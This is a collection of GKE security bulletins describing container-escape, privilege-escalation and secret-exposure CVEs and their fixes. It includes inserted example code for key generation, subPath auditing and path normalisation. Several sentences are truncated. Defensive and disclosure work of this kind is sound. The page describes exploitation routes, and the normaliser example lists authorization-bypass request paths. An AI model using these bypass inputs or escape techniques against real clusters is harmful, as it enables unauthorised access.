GKE is unaffected because the vulnerable module, policykit-1, is not installed on COS or Ubuntu images used in GKE. No action is required. |
None |
GKE clusters on
Description | Severity |
---|---|
A security vulnerability, CVE-2021-4034, has been discovered in pkexec, a part of the Linux policy kit package (polkit), that allows an authenticated user to perform a privilege escalation attack. PolicyKit is generally used only on Linux desktop systems to allow non-root users to perform actions such as rebooting the system, installing packages, restarting services etc., as governed by a policy. The GKE Enterprise default configuration already gives users full "sudo" privileges, so this exploit does not change the existing GKE Enterprise security posture.
Technical details
For this bug to be exploitable, an attacker needs both a non-root shell on the node filesystem and to have the vulnerable version of pkexec installed. While GKE on VMware does include a version of policykit-1 in its release images, the GKE Enterprise default configuration allows passwordless sudo to anyone with shell access already, so this vulnerability does not give a user any more privileges than they already have.
What should I do?
No action is required. GKE on VMware is unaffected. |
None |
GKE clusters on
Description | Severity |
---|---|
GKE on AWS is unaffected. The vulnerable module, policykit-1, is not installed on Ubuntu images used by the current and previous versions of GKE on AWS. | None |
GKE Enterprise on
Description | Severity |
---|---|
A security vulnerability, CVE-2021-4034, has been discovered in pkexec, a part of the Linux policy kit package (polkit), that allows an authenticated user to perform a privilege escalation attack. PolicyKit is generally used only on Linux desktop systems to allow non-root users to perform actions such as rebooting the system, installing packages, restarting services etc., as governed by a policy. The GKE Enterprise default configuration already gives users full "sudo" privileges, so this exploit does not change the existing GKE Enterprise security posture.
Technical details
For this bug to be exploitable, an attacker needs both a non-root shell on the node filesystem and to have the vulnerable version of pkexec installed. While GKE on Azure does include a version of policykit-1 in its release images, the GKE Enterprise default configuration allows passwordless sudo to anyone with shell access already, so this vulnerability does not give a user any more privileges than they already have.
What should I do?
No action is required. GKE on Azure is unaffected. |
None |
GKE clusters on
Description | Severity |
---|---|
Google Distributed Cloud Virtual for Bare Metal might be affected depending on packages that are installed on the customer-managed operating system. Scan your OS images and patch them if necessary. | None |
GCP-2022-002
Published: 2022-02-01
Updated: 2022-03-07
Reference: CVE-2021-4154, CVE-2021-22600, CVE-2022-0185
2022-02-04 Update: Added sections for GKE on AWS and GKE on Azure. Added rollout updates for GKE and GKE on VMware.
GKE
Updated: 2022-03-07
Description | Severity |
---|---|
Three security vulnerabilities, CVE-2021-4154, CVE-2021-22600, and CVE-2022-0185, have been discovered in the Linux kernel, each of which can lead to either a container breakout, privilege escalation on the host, or both. These vulnerabilities affect all node operating systems (COS and Ubuntu) on GKE, GKE on VMware, GKE on AWS (current and previous generation), and GKE on Azure. Pods using GKE Sandbox are not vulnerable to these vulnerabilities. See the COS release notes for more details.
Technical details
In CVE-2021-4154, an attacker can exploit the
CVE-2021-22600 is a double-free vulnerability in packet_set_ring that can lead to a container escape to the host node. With CVE-2022-0185, a heap overflow bug in legacy_parse_param() may lead to an out-of-bounds write that will cause a container breakout. The exploitation path for this vulnerability that relies on the "unshare" syscall is blocked on GKE Autopilot clusters by default using seccomp filtering. Users who have manually enabled the default container runtime seccomp profile on GKE Standard clusters are also protected.
What should I do?
2022-03-07 Update: The versions of Linux node images for the following versions of GKE have been updated with code to fix all these vulnerabilities for both Ubuntu and COS images. Upgrade your control plane and nodes to one of the following GKE versions.
2022-02-25 Update: If you use Ubuntu node images, 1.22.6-gke.1000 does not address CVE-2021-22600. We will update this bulletin with Ubuntu patch versions when they are available.
2022-02-23 Update: The versions of Linux node images for the following versions of GKE have been updated with code to fix these vulnerabilities. Upgrade your clusters to one of the following GKE versions.
2022-02-04 Update: The rollout start date for GKE patch versions was February 2. The versions of Linux node images for the following versions of GKE have been updated with code to fix these vulnerabilities. Upgrade your clusters to one of the following GKE versions.
1.22 and 1.23 versions are also in progress. We will update this bulletin with specific versions when they're available.
What vulnerability is addressed by this patch? |
High |
GKE clusters on
Updated: 2022-02-23
Description | Severity |
---|---|
Three security vulnerabilities, CVE-2021-4154, CVE-2021-22600, and CVE-2022-0185, have been discovered in the Linux kernel, each of which can lead to either a container breakout, privilege escalation on the host, or both. These vulnerabilities affect all node operating systems (COS and Ubuntu) on GKE, GKE on VMware, GKE on AWS (current and previous generation), and GKE on Azure. See the COS release notes for more details.
Technical details
In CVE-2021-4154, an attacker can exploit the
CVE-2021-22600 is a double-free vulnerability in packet_set_ring that can lead to a container escape to the host node. With CVE-2022-0185, a heap overflow bug in legacy_parse_param() may lead to an out-of-bounds write that will cause a container breakout. Users who have manually enabled the default container runtime seccomp profile on GKE Standard clusters are also protected.
What should I do?
2022-02-23 Update: Version 1.10.2 (fixes CVE-2021-22600, CVE-2021-4154, and CVE-2022-0185) is now scheduled for March 1.
2022-02-23 Update: Added patched versions addressing CVE-2021-22600. Version 1.10.1 does not address CVE-2021-22600 but does address the other vulnerabilities. Versions 1.9.4 and 1.10.2, both unreleased, will address CVE-2021-22600. The versions of Linux node images for the following versions of GKE on VMware have been updated with code to fix these vulnerabilities. Upgrade your clusters to one of the following GKE on VMware versions:
2022-02-04 Update: Added information about Ubuntu images not addressing CVE-2021-22600. The versions of Linux node images for the following versions of GKE on VMware have been updated with code to fix these vulnerabilities. Upgrade your clusters to one of the following GKE on VMware versions:
What vulnerability is addressed by this patch? |
High |
GKE clusters on
Description | Severity |
---|---|
Three security vulnerabilities, CVE-2021-4154, CVE-2021-22600, and CVE-2022-0185, have been discovered in the Linux kernel, each of which can lead to either a container breakout, privilege escalation on the host, or both. These vulnerabilities affect all node operating systems (COS and Ubuntu) on GKE, GKE on VMware, GKE on AWS (current and previous generation), and GKE on Azure. See the COS release notes for more details.
Technical details
In CVE-2021-4154, an attacker can exploit the
CVE-2021-22600 is a double-free vulnerability in packet_set_ring that can lead to a container escape to the host node. With CVE-2022-0185, a heap overflow bug in legacy_parse_param() may lead to an out-of-bounds write that will cause a container breakout. Users who have manually enabled the default container runtime seccomp profile on GKE Standard clusters are also protected.
What should I do?
GKE on AWS
The versions of Linux node images for the following versions of GKE on AWS have been updated with code to fix these vulnerabilities. Upgrade your clusters to the following GKE on AWS version:
GKE on AWS (previous generation)
The versions of Linux node images for the following versions of GKE on AWS (previous generation) have been updated with code to fix these vulnerabilities. Upgrade your clusters to one of the following GKE on AWS (previous generation) versions:
What vulnerability is addressed by this patch? |
High |
GKE Enterprise on
Description | Severity |
---|---|
Three security vulnerabilities, CVE-2021-4154, CVE-2021-22600, and CVE-2022-0185, have been discovered in the Linux kernel, each of which can lead to either a container breakout, privilege escalation on the host, or both. These vulnerabilities affect all node operating systems (COS and Ubuntu) on GKE, GKE on VMware, GKE on AWS (current and previous generation), and GKE on Azure. See the COS release notes for more details.
Technical details
In CVE-2021-4154, an attacker can exploit the
CVE-2021-22600 is a double-free vulnerability in packet_set_ring that can lead to a container escape to the host node. With CVE-2022-0185, a heap overflow bug in legacy_parse_param() may lead to an out-of-bounds write that will cause a container breakout. Users who have manually enabled the default container runtime seccomp profile on GKE Standard clusters are also protected.
What should I do?
The versions of Linux node images for the following versions of GKE on Azure have been updated with code to fix these vulnerabilities. Upgrade your clusters to the following GKE on Azure version:
What vulnerability is addressed by this patch? |
High |
GCP-2021-024
Published: 2021-10-21
Reference: CVE-2021-25742
GKE
Description | Severity |
---|---|
A security issue was discovered in the Kubernetes ingress-nginx controller, CVE-2021-25742. Ingress-nginx custom snippets allow retrieval of ingress-nginx service account tokens and secrets across all namespaces.
What should I do?
This security issue does not impact your GKE cluster infrastructure or any GKE Enterprise environments cluster infrastructure. If you use ingress-nginx in your workload deployments, you should be aware of this security issue. See ingress-nginx Issue 7837 for more details. |
None |
GKE clusters on
Description | Severity |
---|---|
A security issue was discovered in the Kubernetes ingress-nginx controller, CVE-2021-25742. Ingress-nginx custom snippets allow retrieval of ingress-nginx service account tokens and secrets across all namespaces.
What should I do?
This security issue does not impact your GKE cluster infrastructure or any GKE Enterprise environments cluster infrastructure. If you use ingress-nginx in your workload deployments, you should be aware of this security issue. See ingress-nginx Issue 7837 for more details. |
None |
GKE clusters on
Description | Severity |
---|---|
A security issue was discovered in the Kubernetes ingress-nginx controller, CVE-2021-25742. Ingress-nginx custom snippets allow retrieval of ingress-nginx service account tokens and secrets across all namespaces.
What should I do?
This security issue does not impact your GKE cluster infrastructure or any GKE Enterprise environments cluster infrastructure. If you use ingress-nginx in your workload deployments, you should be aware of this security issue. See ingress-nginx Issue 7837 for more details. |
None |
GKE clusters on
Description | Severity |
---|---|
A security issue was discovered in the Kubernetes ingress-nginx controller, CVE-2021-25742. Ingress-nginx custom snippets allow retrieval of ingress-nginx service account tokens and secrets across all namespaces.
What should I do?
This security issue does not impact your GKE cluster infrastructure or any GKE Enterprise environments cluster infrastructure. If you use ingress-nginx in your workload deployments, you should be aware of this security issue. See ingress-nginx Issue 7837 for more details. |
None |
GCP-2021-019
Published: 2021-09-29
GKE
Description | Severity |
---|---|
There is a known issue where updating a
Am I impacted?
If your

```shell
kubectl get backendconfigs -A -o json | \
  jq -r '.items[] | select(.spec.securityPolicy == {}) | .metadata | "\(.namespace)/\(.name)"'
```

This issue affects the following GKE versions:
If you do not configure Google Cloud Armor on your Ingress resources via the
What should I do?
Upgrade your GKE control plane to one of the following updated versions that patches this issue and allows
This issue can also be prevented by avoiding the deployment of
To prevent this issue, only make updates to your
Since the
The following sample manifest describes a

```yaml
apiVersion: cloud.google.com/v1
kind: BackendConfig
metadata:
  name: my-backend-config
spec:
  securityPolicy:
    name: "ca-how-to-security-policy"
```

If you have CI/CD systems or tools which regularly update
|
Low |
GCP-2021-022
Published: 2021-09-23
GKE clusters on
Description | Severity |
---|---|
A vulnerability has been discovered in the GKE Enterprise Identity Service (AIS) LDAP module of GKE on VMware versions 1.8 and 1.8.1 where a seed key used in generating keys is predictable. With this vulnerability, an authenticated user could add arbitrary claims and escalate privileges indefinitely.
Technical details
A recent addition to AIS code creates symmetric keys using golang's math/rand module, which is not suitable for security-sensitive code. The module is used in a way that will generate a predictable key. During identity verification, a secure token service (STS) key is generated that is subsequently encrypted with a symmetric key that is simple to derive.
What should I do?
This vulnerability only affects customers using AIS in GKE on VMware versions 1.8 and 1.8.1. For users of GKE on VMware 1.8, upgrade your clusters to the following version:
|
High |
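The weak-key pattern described in the GCP-2021-022 bulletin above, as an added Go illustration that is not the AIS code or any Google code: a symmetric key drawn from math/rand is a pure function of its seed, so two independently constructed generators given the same seed produce byte-identical keys, whereas crypto/rand draws from the operating system CSPRNG and has no seed to leak. The function names, the 32-byte key size and the seed values are assumptions made for this example.

```go
package main

// Added example, not the AIS implementation: contrasts a math/rand-derived
// symmetric key (deterministic, predictable from its seed) with one read from
// crypto/rand. Function names and the 32-byte key size are assumptions.

import (
	"bytes"
	crand "crypto/rand"
	"encoding/hex"
	"fmt"
	mrand "math/rand"
)

const keySize = 32 // assumption: a 256-bit symmetric key

// WeakKey derives a key from math/rand, a deterministic PRNG. The output is
// entirely determined by the seed, so anyone who knows or can guess the seed
// (a second-resolution timestamp, a small counter, or the pre-Go-1.20 default
// of 1 when rand.Seed is never called) regenerates the same key. This is the
// defect class in the bulletin, not a copy of the affected code.
func WeakKey(seed int64) []byte {
	r := mrand.New(mrand.NewSource(seed))
	key := make([]byte, keySize)
	for i := range key {
		key[i] = byte(r.Intn(256))
	}
	return key
}

// StrongKey reads the key from the operating system CSPRNG via crypto/rand.
// There is no seed, so nothing an observer could learn lets them reproduce it.
func StrongKey() ([]byte, error) {
	key := make([]byte, keySize)
	if _, err := crand.Read(key); err != nil {
		return nil, fmt.Errorf("crypto/rand: %w", err)
	}
	return key, nil
}

// IsReproducible reports whether two separately constructed math/rand
// generators with the same seed yield identical keys, i.e. whether knowing
// the seed is enough to recover the key.
func IsReproducible(seed int64) bool {
	return bytes.Equal(WeakKey(seed), WeakKey(seed))
}

// Distinct reports whether two keys differ. For two 32-byte CSPRNG outputs
// a collision has probability 2^-256, so this should always be true.
func Distinct(a, b []byte) bool {
	return !bytes.Equal(a, b)
}

func main() {
	// Constructed scenario: two "processes" both seed with the same low-entropy value.
	seed := int64(1) // the pre-Go-1.20 default seed when rand.Seed is never called
	fmt.Printf("weak key, generator A: %s\n", hex.EncodeToString(WeakKey(seed)))
	fmt.Printf("weak key, generator B: %s\n", hex.EncodeToString(WeakKey(seed)))
	fmt.Println("predictable from seed:", IsReproducible(seed))

	a, err := StrongKey()
	if err != nil {
		panic(err)
	}
	b, err := StrongKey()
	if err != nil {
		panic(err)
	}
	fmt.Printf("strong key A: %s\n", hex.EncodeToString(a))
	fmt.Printf("strong key B: %s\n", hex.EncodeToString(b))
	fmt.Println("independent:", Distinct(a, b))
}
```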
GCP-2021-021
Published: 2021-09-22
Reference: CVE-2020-8561
GKE
Description | Severity |
---|---|
A security vulnerability, CVE-2020-8561, has been discovered in Kubernetes where certain webhooks can be made to redirect
Technical details
With this vulnerability, actors who control the responses of
This issue can be mitigated by changing certain parameters for the API server.
What should I do?
No action is required at this time. Currently available versions of GKE and GKE Enterprise have implemented the following mitigations that protect against this type of attack:
What vulnerability is addressed by this patch?
CVE-2020-8561 |
Medium |
GKE clusters on
Description | Severity |
---|---|
A security vulnerability, CVE-2020-8561, has been discovered in Kubernetes where certain webhooks can be made to redirect
Technical details
With this vulnerability, actors who control the responses of
This issue can be mitigated by changing certain parameters for the API server.
What should I do?
No action is required at this time. Currently available versions of GKE and GKE Enterprise have implemented the following mitigations that protect against this type of attack:
What vulnerability is addressed by this patch?
CVE-2020-8561 |
Medium |
GKE clusters on
Description | Severity |
---|---|
A security vulnerability, CVE-2020-8561, has been discovered in Kubernetes where certain webhooks can be made to redirect
Technical details
With this vulnerability, actors who control the responses of
This issue can be mitigated by changing certain parameters for the API server.
What should I do?
No action is required at this time. Currently available versions of GKE and GKE Enterprise have implemented the following mitigations that protect against this type of attack:
What vulnerability is addressed by this patch?
CVE-2020-8561 |
Medium |
GKE clusters on
Description | Severity |
---|---|
A security vulnerability, CVE-2020-8561, has been discovered in Kubernetes where certain webhooks can be made to redirect
Technical details
With this vulnerability, actors who control the responses of
This issue can be mitigated by changing certain parameters for the API server.
What should I do?
No action is required at this time. Currently available versions of GKE and GKE Enterprise have implemented the following mitigations that protect against this type of attack:
What vulnerability is addressed by this patch?
CVE-2020-8561 |
Medium |
GCP-2021-018
Published: 2021-09-15
Updated: 2021-09-24
Reference: CVE-2021-25741
2021-09-24 update: GKE on Bare Metal bulletin updated with additional patched versions.
2021-09-20 update: Bulletins added for GKE on Bare Metal
2021-09-16 update: Bulletins added for GKE on VMware
GKE
Description | Severity |
---|---|
A security issue was discovered in Kubernetes, CVE-2021-25741, where a user may be able to create a container with subpath volume mounts to access files and directories outside of the volume, including on the host filesystem.
Technical details:
In CVE-2021-25741, the attacker can create a symbolic link from a mounted emptyDir to the root filesystem of the node ( / ); the kubelet will follow the symlink and mount the host root into the container.
What should I do?
We recommend that you upgrade your node pools to one of the following versions or later to take advantage of the latest patches:
The following versions also contain the fix:
|
High |
GKE clusters on VMware

A security issue was discovered in Kubernetes, CVE-2021-25741, where a user may be able to create a container with subpath volume mounts to access files and directories outside of the volume, including on the host filesystem.

Technical details: In CVE-2021-25741, the attacker can create a symbolic link from a mounted emptyDir to the root filesystem of the node (/); the kubelet will follow the symlink and mount the host root into the container.

What should I do?

Updated 2021-09-24: Patched versions 1.8.3 and 1.7.4 are now available.

Updated 2021-09-17: Corrected the list of available versions that contain the patch.

The following versions of GKE on VMware have been updated with code to fix this vulnerability. Upgrade your admin clusters and user clusters to one of the following versions:

Severity: High
GKE clusters on AWS

A security issue was discovered in Kubernetes, CVE-2021-25741, where a user may be able to create a container with subpath volume mounts to access files and directories outside of the volume, including on the host filesystem.

Technical details: In CVE-2021-25741, the attacker can create a symbolic link from a mounted emptyDir to the root filesystem of the node (/); the kubelet will follow the symlink and mount the host root into the container.

What should I do?

2021-09-16 update: Added list of supported gke-versions for

The following versions of GKE on AWS have been updated with code to fix this vulnerability. It is recommended that you:

Severity: High
GKE clusters on Bare Metal

A security issue was discovered in Kubernetes, CVE-2021-25741, where a user may be able to create a container with subpath volume mounts to access files and directories outside of the volume, including on the host filesystem.

Technical details: In CVE-2021-25741, the attacker can create a symbolic link from a mounted emptyDir to the root filesystem of the node (/); the kubelet will follow the symlink and mount the host root into the container.

What should I do?

The following versions of GKE on Bare Metal have been updated with code to fix this vulnerability. Upgrade your admin clusters and user clusters to one of the following versions:

Severity: High
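The GCP-2021-018 bulletin above, for every platform, says the exposure is containers that use subPath volume mounts. Until each node pool is on a patched version, the practical first step is to know which workloads actually use subPath. The following is an added example, not code from the bulletin or from Google: a small Python audit that walks a pod spec (the shape `kubectl get pods -A -o json` emits) and reports every `subPath` or `subPathExpr` mount together with the backing volume type. The pod manifest it runs on is constructed for the example, and the function names (`find_subpath_mounts`, `audit_pod_list`) are this example's own.

```python
"""Audit pod specs for subPath volume mounts (added example, not Google's code).

CVE-2021-25741 concerns containers that use subPath volume mounts. This script
lists which containers rely on them, and on which volume types, so the
workloads that matter can be reviewed before the node-pool upgrade lands.
The pod manifest below is constructed for the example; in practice feed it
the items of `kubectl get pods -A -o json`.
"""
from typing import Any

# Constructed sample pod: two of its three containers use subPath/subPathExpr.
SAMPLE_POD: dict[str, Any] = {
    "metadata": {"name": "web", "namespace": "team-a"},
    "spec": {
        "volumes": [
            {"name": "scratch", "emptyDir": {}},
            {"name": "cfg", "configMap": {"name": "web-config"}},
            {"name": "data", "persistentVolumeClaim": {"claimName": "web-pvc"}},
        ],
        "initContainers": [
            {"name": "init",
             "volumeMounts": [{"name": "scratch", "mountPath": "/init"}]},
        ],
        "containers": [
            {"name": "app",
             "volumeMounts": [
                 {"name": "scratch", "mountPath": "/tmp/work", "subPath": "work"},
                 {"name": "cfg", "mountPath": "/etc/app"},
             ]},
            {"name": "sidecar",
             "volumeMounts": [
                 {"name": "data", "mountPath": "/data", "subPathExpr": "$(POD_NAME)"},
             ]},
        ],
    },
}


def volume_type(volume: dict[str, Any]) -> str:
    """Return the volume source key (emptyDir, configMap, ...) of a pod volume."""
    return next((k for k in volume if k != "name"), "unknown")


def find_subpath_mounts(pod: dict[str, Any]) -> list[dict[str, str]]:
    """Return one finding per volumeMount that sets subPath or subPathExpr.

    Init containers are included because they mount volumes through the same
    kubelet code path as regular containers.
    """
    spec = pod.get("spec", {})
    vol_types = {v["name"]: volume_type(v) for v in spec.get("volumes", [])}
    meta = pod.get("metadata", {})
    pod_ref = f"{meta.get('namespace', 'default')}/{meta.get('name', '?')}"
    findings: list[dict[str, str]] = []
    for container in spec.get("initContainers", []) + spec.get("containers", []):
        for mount in container.get("volumeMounts", []):
            sub = mount.get("subPath") or mount.get("subPathExpr")
            if sub is None:
                continue
            findings.append({
                "pod": pod_ref,
                "container": container["name"],
                "volume": mount["name"],
                "volume_type": vol_types.get(mount["name"], "unknown"),
                "mount_path": mount["mountPath"],
                "sub_path": sub,
            })
    return findings


def audit_pod_list(pod_list: dict[str, Any]) -> list[dict[str, str]]:
    """Run find_subpath_mounts over a PodList (the shape kubectl -o json emits)."""
    findings: list[dict[str, str]] = []
    for pod in pod_list.get("items", []):
        findings.extend(find_subpath_mounts(pod))
    return findings


if __name__ == "__main__":
    for f in audit_pod_list({"items": [SAMPLE_POD]}):
        print(f"{f['pod']} container={f['container']} volume={f['volume']} "
              f"({f['volume_type']}) mount={f['mount_path']} subPath={f['sub_path']}")
```

The report is deliberately flat (one line per mount) so it can be sorted by namespace or volume type; emptyDir-backed subPath mounts are the ones the technical details single out, but every subPath mount is listed because the fix lives in the kubelet, not in any one volume plugin.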
GCP-2021-017

Published: 2021-09-01
Updated: 2021-09-23
Reference: CVE-2021-33909, CVE-2021-33910
GKE

2021-09-23 update: Containers running inside of GKE Sandbox are unaffected by this vulnerability for attacks originating inside the container.

2021-09-15 update: The following GKE versions address the vulnerabilities:

Two security vulnerabilities, CVE-2021-33909 and CVE-2021-33910, have been discovered in the Linux kernel that can lead to an OS crash or an escalation to root by an unprivileged user. This vulnerability affects all GKE node operating systems (COS and Ubuntu).

Technical details: In CVE-2021-33909, the Linux kernel's filesystem layer does not properly restrict seq buffer allocations, leading to an integer overflow, an out-of-bounds write, and escalation to root.

What should I do?

The versions of Linux node images for the following versions of GKE have been updated with code to fix this vulnerability. Upgrade your clusters to one of the following versions:

Severity: High
GKE clusters on AWS

Two security vulnerabilities, CVE-2021-33909 and CVE-2021-33910, have been discovered in the Linux kernel that can lead to an OS crash or an escalation to root by an unprivileged user. This vulnerability affects all GKE node operating systems (COS and Ubuntu).

Technical details: In CVE-2021-33909, the Linux kernel's filesystem layer does not properly restrict seq buffer allocations, leading to an integer overflow, an out-of-bounds write, and escalation to root.

What should I do?

The versions of Linux node images for GKE on AWS have been updated with code to fix this vulnerability. Upgrade your clusters to one of the following versions:

Severity: High
GKE clusters on VMware

Two security vulnerabilities, CVE-2021-33909 and CVE-2021-33910, have been discovered in the Linux kernel that can lead to an OS crash or an escalation to root by an unprivileged user. This vulnerability affects all GKE node operating systems (COS and Ubuntu).

Technical details: In CVE-2021-33909, the Linux kernel's filesystem layer does not properly restrict seq buffer allocations, leading to an integer overflow, an out-of-bounds write, and escalation to root.

What should I do?

The versions of Linux and COS node images for GKE on VMware have been updated with code to fix this vulnerability. Upgrade your clusters to one of the following versions:

Severity: High
GCP-2021-015

Published: 2021-07-13
Updated: 2021-07-15
Reference: CVE-2021-22555
GKE

A new security vulnerability, CVE-2021-22555, has been discovered where a malicious actor with

Technical details

In this attack, an out-of-bounds write in

What should I do?

The following versions of Linux on GKE have been updated with code to fix this vulnerability. Upgrade your clusters to one of the following versions:

What vulnerability is addressed by this patch?

Severity: High
GKE clusters on VMware

A new security vulnerability, CVE-2021-22555, has been discovered where a malicious actor with

Technical details

In this attack, an out-of-bounds write in

What should I do?

The following versions of Linux on GKE on VMware have been updated with code to fix this vulnerability. Upgrade your clusters to one of the following versions:

What vulnerability is addressed by this patch?

Severity: High
GCP-2021-014

Published: 2021-07-05
Reference: CVE-2021-34527
GKE

Microsoft published a security bulletin on a remote code execution (RCE) vulnerability, CVE-2021-34527, that affects the print spooler in Windows servers. The CERT Coordination Center (CERT/CC) published an update note on a related vulnerability, dubbed "PrintNightmare", that also affects Windows print spoolers: PrintNightmare, Critical Windows Print Spooler Vulnerability.

What should I do?

No action is required. GKE Windows nodes do not contain the affected Spooler service as part of the base image, so GKE Windows deployments are not vulnerable to this attack.

What vulnerabilities are addressed by this bulletin?

Severity: High
GCP-2021-012

Published: 2021-07-01
Updated: 2021-07-09
Reference: CVE-2021-34824
GKE

The Istio project recently disclosed a new security vulnerability (CVE-2021-34824) affecting Istio. Istio contains a remotely exploitable vulnerability where credentials specified in the Gateway and DestinationRule credentialName field can be accessed from different namespaces.

Technical details: The Istio secure Gateway or workloads using the DestinationRule can load TLS private keys and certificates from Kubernetes secrets via the credentialName configuration. From Istio 1.8 and above, the secrets are read from istiod and conveyed to gateways and workloads via XDS. Normally, a gateway or workload deployment is only able to access TLS certificates and private keys stored in the secret within its namespace. However, a bug in istiod allows a client authorized to access the Istio XDS API to retrieve any TLS certificate and private keys cached in istiod.

What should I do?

GKE clusters do not run Istio by default and, when enabled, use Istio version 1.6, which is not vulnerable to this attack. If you have installed or upgraded Istio on the cluster to Istio 1.8 or above, upgrade your Istio to the latest supported version.

Severity: High
GKE clusters on VMware

The Istio project recently disclosed a new security vulnerability (CVE-2021-34824) affecting Istio. Istio contains a remotely exploitable vulnerability where credentials specified in the Gateway and DestinationRule credentialName field can be accessed from different namespaces.

Technical details: The Istio secure Gateway or workloads using the DestinationRule can load TLS private keys and certificates from Kubernetes secrets via the credentialName configuration. From Istio 1.8 and above, the secrets are read from istiod and conveyed to gateways and workloads via XDS. Normally, a gateway or workload deployment is only able to access TLS certificates and private keys stored in the secret within its namespace. However, a bug in istiod allows a client authorized to access the Istio XDS API to retrieve any TLS certificate and private keys cached in istiod.

What should I do?

Anthos clusters on VMware v1.6 and v1.7 are not vulnerable to this attack. Anthos clusters on VMware v1.8 are vulnerable. If you are using Anthos clusters on VMware v1.8, upgrade to the following patched version or later:

Severity: High
GKE clusters on Bare Metal

The Istio project recently disclosed a new security vulnerability (CVE-2021-34824) affecting Istio. Istio contains a remotely exploitable vulnerability where credentials specified in the Gateway and DestinationRule credentialName field can be accessed from different namespaces.

Technical details: The Istio secure Gateway or workloads using the DestinationRule can load TLS private keys and certificates from Kubernetes secrets via the credentialName configuration. From Istio 1.8 and above, the secrets are read from istiod and conveyed to gateways and workloads via XDS. Normally, a gateway or workload deployment is only able to access TLS certificates and private keys stored in the secret within its namespace. However, a bug in istiod allows a client authorized to access the Istio XDS API to retrieve any TLS certificate and private keys cached in istiod. Clusters created or upgraded with Anthos clusters on bare metal v1.8.0 are impacted by this CVE.

What should I do?

Anthos v1.6 and 1.7 are not vulnerable to this attack. If you have v1.8.0 clusters, download and install the 1.8.1 version of bmctl and upgrade your clusters to the following patched version:

Severity: High
GCP-2021-011

Published: 2021-06-04
Updated: 2021-10-19
Reference: CVE-2021-30465

2021-10-19 update: Added bulletins for GKE on VMware, GKE on AWS, and GKE on Bare Metal.
GKE

The security community recently disclosed a new security vulnerability (CVE-2021-30465) found in

For GKE, because exploiting this vulnerability requires the ability to create pods, we have rated the severity of this vulnerability at MEDIUM.

Technical details

The

For this specific attack, a user can potentially exploit a race condition by starting multiple pods on a single node simultaneously, all of which share the same volume mount with a symlink. If the attack succeeds, one of the pods will mount the node's filesystem with root permissions.

What should I do?

There is a newly released patch to

Upgrade your GKE cluster to one of the following updated versions:

Severity: Medium
GKE clusters on VMware

The security community recently disclosed a new security vulnerability (CVE-2021-30465) found in

For GKE on VMware, because exploiting this vulnerability requires the ability to create pods, we have rated the severity of this vulnerability at MEDIUM.

Technical details

The

For this specific attack, a user can potentially exploit a race condition by starting multiple pods on a single node simultaneously, all of which share the same volume mount with a symlink. If the attack succeeds, one of the pods will mount the node's filesystem with root permissions.

What should I do?

There is a newly released patch to

Severity: Medium
GKE clusters on AWS

The security community recently disclosed a new security vulnerability (CVE-2021-30465) found in

Because this is an OS-level vulnerability, GKE on AWS is not vulnerable.

Technical details

The

For this specific attack, a user can potentially exploit a race condition by starting multiple pods on a single node simultaneously, all of which share the same volume mount with a symlink. If the attack succeeds, one of the pods will mount the node's filesystem with root permissions.

What should I do?

Ensure that the OS version on which you are running GKE on AWS is upgraded to the latest OS version that has an updated runc package.

Severity: None
GKE clusters on Bare Metal

The security community recently disclosed a new security vulnerability (CVE-2021-30465) found in

Because this is an OS-level vulnerability, GKE on Bare Metal is not vulnerable.

Technical details

The

For this specific attack, a user can potentially exploit a race condition by starting multiple pods on a single node simultaneously, all of which share the same volume mount with a symlink. If the attack succeeds, one of the pods will mount the node's filesystem with root permissions.

What should I do?

Ensure that the OS version on which you are running Google Distributed Cloud Virtual for Bare Metal is upgraded to the latest OS version that has an updated

Severity: None
GCP-2021-006

Published: 2021-05-11
Reference: CVE-2021-31920
GKE

The Istio project recently disclosed a new security vulnerability (CVE-2021-31920) affecting Istio. Istio contains a remotely exploitable vulnerability where an HTTP request with multiple slashes or escaped slash characters can bypass Istio authorization policy when path-based authorization rules are used.

What should I do?

We strongly recommend that you update and reconfigure your GKE clusters. Note that it is important to complete both steps below to successfully resolve the vulnerability:

Severity: High
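The bulletin above describes the bypass only at the level of "multiple slashes or escaped slash characters"; the concrete steps it refers to are not on the page. The following is an added example, not Istio's or Google's code, that shows why the reconfiguration matters: a path-based deny rule evaluated against the raw request path lets `//admin/users` and `/admin%2Fusers` through, while the same rule evaluated after canonicalization (percent-decode, merge slashes, resolve dot segments) does not. The policy (`DENY_PATHS`, standing in for an Istio-style `/admin/*` path rule) and the sample requests are constructed; the function names are this example's own.

```python
"""Path canonicalization before authorization matching (added example, not Istio's code).

CVE-2021-31920 is about path-based authorization rules being bypassed by
requests whose path carries repeated or percent-encoded slashes. The policy
and requests below are constructed; DENY_PATHS stands in for a path-based
AuthorizationPolicy rule that denies everything under /admin.
"""
import posixpath
import re
from urllib.parse import unquote

# Constructed policy: deny any request whose path is under /admin
# (an Istio-style "/admin/*" prefix pattern).
DENY_PATHS = ["/admin/*"]

# Constructed requests; the last three are the bypass shapes the bulletin describes.
SAMPLE_REQUESTS = [
    "/public/index.html",
    "/admin/users",
    "//admin/users",
    "/admin%2Fusers",
    "/public/..%2Fadmin/users",
]


def path_matches(rule: str, path: str) -> bool:
    """Match one path rule: a trailing '*' means prefix match, otherwise exact match."""
    if rule.endswith("*"):
        return path.startswith(rule[:-1])
    return path == rule


def naive_denied(path: str) -> bool:
    """Evaluate the rules against the raw request path (the vulnerable behaviour)."""
    return any(path_matches(rule, path) for rule in DENY_PATHS)


def normalize_path(raw_path: str) -> str:
    """Canonicalize a request path before matching it against policy.

    Steps: drop the query string, percent-decode (so %2F becomes '/'),
    merge runs of slashes, then resolve '.' and '..' segments. Merging
    slashes before normpath matters because posixpath.normpath keeps a
    leading '//' intact.
    """
    path = raw_path.split("?", 1)[0]
    path = unquote(path)
    path = re.sub(r"/{2,}", "/", path)
    path = posixpath.normpath(path or "/")
    if not path.startswith("/"):
        path = "/" + path
    return path


def hardened_denied(path: str) -> bool:
    """Evaluate the rules against the canonical form of the path (the fixed behaviour)."""
    return any(path_matches(rule, normalize_path(path)) for rule in DENY_PATHS)


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(f"{req:28} naive_denied={naive_denied(req)!s:5} "
              f"hardened_denied={hardened_denied(req)}")
```

The point of the example is the ordering: decode first, then merge, then resolve dot segments, and only then match. Any rule engine that matches before one of those steps has a bypass of the same shape as the one the bulletin describes, which is why "reconfigure" is listed as a step alongside "update".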
GCP-2021-004

Published: 2021-05-06
Reference: CVE-2021-28683, CVE-2021-28682, CVE-2021-29258
GKE

